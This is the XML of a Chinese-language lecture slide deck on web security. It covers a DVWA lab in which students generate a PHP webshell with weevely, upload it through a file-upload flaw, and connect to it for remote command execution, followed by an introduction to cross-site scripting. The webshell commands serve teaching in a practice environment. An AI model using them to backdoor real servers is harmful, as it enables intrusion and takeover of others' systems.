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2"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId43"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="9228" r:id="rId2"/>
    <p:sldId id="9234" r:id="rId3"/>
    <p:sldId id="9217" r:id="rId4"/>
    <p:sldId id="9229" r:id="rId5"/>
    <p:sldId id="9236" r:id="rId6"/>
    <p:sldId id="9231" r:id="rId7"/>
    <p:sldId id="9306" r:id="rId8"/>
    <p:sldId id="9230" r:id="rId9"/>
    <p:sldId id="9235" r:id="rId10"/>
    <p:sldId id="9233" r:id="rId11"/>
    <p:sldId id="9308" r:id="rId12"/>
    <p:sldId id="9309" r:id="rId13"/>
    <p:sldId id="9310" r:id="rId14"/>
    <p:sldId id="9311" r:id="rId15"/>
    <p:sldId id="9312" r:id="rId16"/>
    <p:sldId id="9313" r:id="rId17"/>
    <p:sldId id="9305" r:id="rId18"/>
    <p:sldId id="9221" r:id="rId19"/>
    <p:sldId id="9218" r:id="rId20"/>
    <p:sldId id="9314" r:id="rId21"/>
    <p:sldId id="9315" r:id="rId22"/>
    <p:sldId id="9232" r:id="rId23"/>
    <p:sldId id="9316" r:id="rId24"/>
    <p:sldId id="9317" r:id="rId25"/>
    <p:sldId id="9318" r:id="rId26"/>
    <p:sldId id="9319" r:id="rId27"/>
    <p:sldId id="9237" r:id="rId28"/>
    <p:sldId id="9238" r:id="rId29"/>
    <p:sldId id="9320" r:id="rId30"/>
    <p:sldId id="9239" r:id="rId31"/>
    <p:sldId id="9240" r:id="rId32"/>
    <p:sldId id="9321" r:id="rId33"/>
    <p:sldId id="9323" r:id="rId34"/>
    <p:sldId id="9324" r:id="rId35"/>
    <p:sldId id="9325" r:id="rId36"/>
    <p:sldId id="9326" r:id="rId37"/>
    <p:sldId id="9327" r:id="rId38"/>
    <p:sldId id="9328" r:id="rId39"/>
    <p:sldId id="9329" r:id="rId40"/>
    <p:sldId id="9330" r:id="rId41"/>
  </p:sldIdLst>
  <p:sldSz cx="12858750" cy="7232650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId4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3" autoAdjust="0"/>
    <p:restoredTop sz="94080" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="696" y="46"/>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804000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74231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005804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398478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08788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35230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70564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63787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28616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46785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687802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1415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1715830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891370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732648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97363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02875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2398211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532788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043911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686265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893663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925217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682831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77859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890089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30981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225682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49588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0951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93537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718326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第十一章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2108895" y="1282153"/>
            <a:ext cx="8640960" cy="12540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测试环境，在其中的</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DVWA</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里实现一句话木马的上传。并用</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Kail</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Linux</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中的自带的</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连接后门</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，获取服务器权限。</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992771" y="2775842"/>
            <a:ext cx="10873208" cy="1834602"/>
            <a:chOff x="2468935" y="3335160"/>
            <a:chExt cx="7848872" cy="3607969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861378" y="3533002"/>
              <a:ext cx="7144552" cy="3138505"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125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开放式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应用程序安全项目</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 </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是世界上最知名的</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安全与数据库安全研究组织，该组织分别在</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2007</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2013</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年统计过十大</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安全漏洞。我们基于</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发布的开源虚拟镜像“</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OWASP Broken Web Applications VM</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来演示如何利用文件上传漏洞。</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137">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABA8CF73-B9C9-44BC-9F02-7B90850FC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983" y="4849207"/>
            <a:ext cx="7344816" cy="210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477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33DB7-B9A2-4467-B04E-5F8D58C0E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="447973"/>
            <a:ext cx="11233248" cy="504625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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通过用户名</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密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user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登录，将网页左下端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DVWA Security</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设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Low</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。然后选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Upload</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，如下：</a:t>
            </a:r>
            <a:endPar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7" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E14E3593-4C50-45FC-9489-04D2489D3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51" y="1071576"/>
            <a:ext cx="9433048" cy="563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2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33DB7-B9A2-4467-B04E-5F8D58C0E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="447973"/>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然后，打开</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Kali Linux</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终端，输入命令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，可以看到基本的使用方法。效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FEAA467-65F4-4324-95A9-7235ED64D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891" y="952598"/>
            <a:ext cx="9145016" cy="586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43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33DB7-B9A2-4467-B04E-5F8D58C0E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="663997"/>
            <a:ext cx="11233248" cy="1230401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pP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按照提示的使用方法，输入命令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generate pass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来生成一句话木马</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，连接密码是</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。执行效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{924FA008-BE7F-4C57-90C5-50738D0E5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51" y="2316155"/>
            <a:ext cx="11665296"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F643FC4-C718-4C52-817D-0C296DD88E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="372120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相比一句话木马，所产生的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将具有更强大的后门能力、免杀能力</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394079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33DB7-B9A2-4467-B04E-5F8D58C0E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892871" y="324048"/>
            <a:ext cx="11233248" cy="504625"/>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回到上传页面点击</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Browse</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按钮，将我们生成的文件</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进行上传。效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3132A852-050B-459F-AE93-CCD9A4F90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871" y="952598"/>
            <a:ext cx="8635280" cy="471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BA4D0FB2-0A8F-433D-8A4C-9C3C44A4B6AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105388" y="5798043"/>
            <a:ext cx="6647974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以看到文件上传成功，并且页面回显出我们上传文件的路径。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53170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433DB7-B9A2-4467-B04E-5F8D58C0E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028775" y="663997"/>
            <a:ext cx="11233248" cy="961097"/>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打开终端，使用命令</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weevely</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http://192.168.209.136/dvwa/hackable/uploads/shell.php pass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连接后门，拿到服务器权限。这个时候就相当于</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ssh</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远程连接了服务器，可以任意命令执行了，效果如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF643FC4-C718-4C52-817D-0C296DD88E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812751" y="5776565"/>
            <a:ext cx="11233248" cy="614848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="20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ls</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命令，可以看到当前目录下的文件，其中就有我们上传的</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shell.php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5123" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF595A3-F8C3-41F8-BAB5-56332BBDC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927" y="1625410"/>
            <a:ext cx="7776864" cy="434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65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实验二</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992771" y="1672109"/>
            <a:ext cx="10873208" cy="3462683"/>
            <a:chOff x="2468935" y="3335160"/>
            <a:chExt cx="7848872" cy="3607969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2821095" y="4151084"/>
              <a:ext cx="7144552" cy="2419734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>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View Source</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查看上传文件的源代码，比较三种不同安全级别的代码有什么不同？？思考要做到安全的文件上传，服务端应该从哪些角度对用户上传的文件进行检测。</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94986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知识点二：跨站脚本攻击</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902529"/>
            <a:ext cx="10657184" cy="1683747"/>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2013</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应用程序十大漏洞中位居第三。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应用程序经常存在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注入攻击区别在于：</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主要影响的是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应用程序的用户，而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注入则主要影响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应用程序自身。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDEEDD24-1679-468D-A1A9-BAC685F32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125" y="3139246"/>
            <a:ext cx="4762500" cy="3190875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9693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022902"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现在大多数网站都使用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VBScript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来执行计算、页面格式化、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管理以及其他客户动作。这类脚本是在浏览网站的用户的计算机（客户机）上运行的，而不是在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服务器自身中运行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AEAB04-9B54-4899-92BA-29BCBCAE5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768" y="3400301"/>
            <a:ext cx="5385214" cy="2520280"/>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知识点一：文件上传漏洞 </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下面是一个简单的脚本示例：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形: 圆角 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0F91AE-3150-4A4F-BE5C-5BD47F5BEB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3055812" y="4840460"/>
            <a:ext cx="6747126" cy="144015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在这个简单的实例中，该网页通过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浏览器将该文本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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3233CB65-8DF4-4AE6-ADAC-1A3E9148236A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2756967" y="2176165"/>
            <a:ext cx="7823770" cy="1938992"/>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&lt;html&gt; &lt;head&gt; &lt;/head&gt; &lt;body&gt;</a:t>
            </a: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&lt;script type="text/</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solidFill>
                  <a:srgbClr val="0050A3"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </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document.write</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 script was used to display this text");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p>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&lt;/body&gt; &lt;/html&gt;</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095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1240061"/>
            <a:ext cx="12968501"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当浏览器执行该脚本时，最终的页面如下图所示：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 150" descr="17的屏幕截图">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F15FF0-8007-47EA-A122-939ECB88B195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2792971" y="1888133"/>
            <a:ext cx="7272808" cy="4786760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38646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1" y="740344"/>
            <a:ext cx="10657185" cy="1683747"/>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浏览该网站的用户不会察觉到本地运行的脚本对网页的内容进行了转换。从浏览器呈现的视图来看，它看上去与静态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页面没有任何的区别。只有当用户查看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源代码时才可能看到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，如下图所示：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 151" descr="40的屏幕截图">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58F807CA-5AD6-4F2F-A765-0FC2F2F59E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3493024" y="2536205"/>
            <a:ext cx="5872700" cy="3869073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168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1031225"/>
            <a:ext cx="11089233" cy="1417648"/>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大多数浏览器都包含脚本支持，而且通常情况下是默认启用的。</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启用并使用脚本并不是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漏洞存在的原因。只有当</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应用程序开发人员犯错误时才会变得危险。</a:t>
            </a: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下面的脚本是安全的： </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113409" y="2968253"/>
            <a:ext cx="4676006" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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function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myFunction</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alert("Hello World!");</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0C38C04D-63C7-4483-82DE-BCF7BB80A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937" y="2968253"/>
            <a:ext cx="4171950" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19922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088301" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="408830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94200"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跨站脚本的含义</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610534"/>
            <a:ext cx="10657184" cy="575751"/>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根据其特征和利用手法的不同，主要分成两大类型：</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C12DD192-06AC-4414-9D05-90D29408EA06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1820863" y="4769519"/>
            <a:ext cx="9217024" cy="1200329"/>
            <a:chOff x="4933525" y="2471924"/>
            <a:chExt cx="9217024" cy="1200329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="六边形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE0F81A-D1B6-4068-926C-607E29CA042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62B62025-39FF-4F56-960C-CEA2860600BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6984268" y="2471924"/>
              <a:ext cx="7166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反射式跨站脚本也称作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非持久型、参数型跨站脚本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。主要</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用于将恶意脚本附加到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URL</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地址的参数中</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，下面是一个简单的存在漏洞的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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="直接连接符 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55A172D-EC37-430F-A1C9-BE3684B9DB9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5624E093-6877-4DB2-A2A4-C1D2424B055D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3873555" y="2448200"/>
            <a:ext cx="1622946" cy="1622946"/>
            <a:chOff x="2716147" y="2106202"/>
            <a:chExt cx="1622946" cy="1622946"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="is1ide-Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D937BCC-DF60-48E5-AB73-9205EBD8F20A}"/>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00FD194-ADC4-4F65-868A-77F8042D7993}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2828972" y="2219027"/>
              <a:ext cx="1397296" cy="1397296"/>
              <a:chOff x="2696934" y="2774952"/>
              <a:chExt cx="1035027" cy="1035027"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E861D5B5-3CC5-4508-A538-3372471ECAFA}"/>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7AD2EF90-BB75-46E3-BFA8-B69138C6E6BB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2751189" y="3042129"/>
                <a:ext cx="926517"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反射式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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E70A6F73-F47F-40CF-8261-8388472535BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7362251" y="2418076"/>
            <a:ext cx="1622946" cy="1622946"/>
            <a:chOff x="2716147" y="2106202"/>
            <a:chExt cx="1622946" cy="1622946"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="is1ide-Oval 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84577EC7-62AA-44CF-A287-6FB1E7757A06}"/>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id="{EB10ED99-C49B-4161-B1CC-A15614FC3C3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2828972" y="2219027"/>
              <a:ext cx="1397296" cy="1397296"/>
              <a:chOff x="2696934" y="2774952"/>
              <a:chExt cx="1035027" cy="1035027"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="is1ide-Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F6CC92-16DF-47E0-B993-91CC94BE65AC}"/>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6CD78B7D-53F7-49E3-A1EF-FFA18FE81C8D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2751189" y="3042128"/>
                <a:ext cx="926516"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持久式</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跨站脚本</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
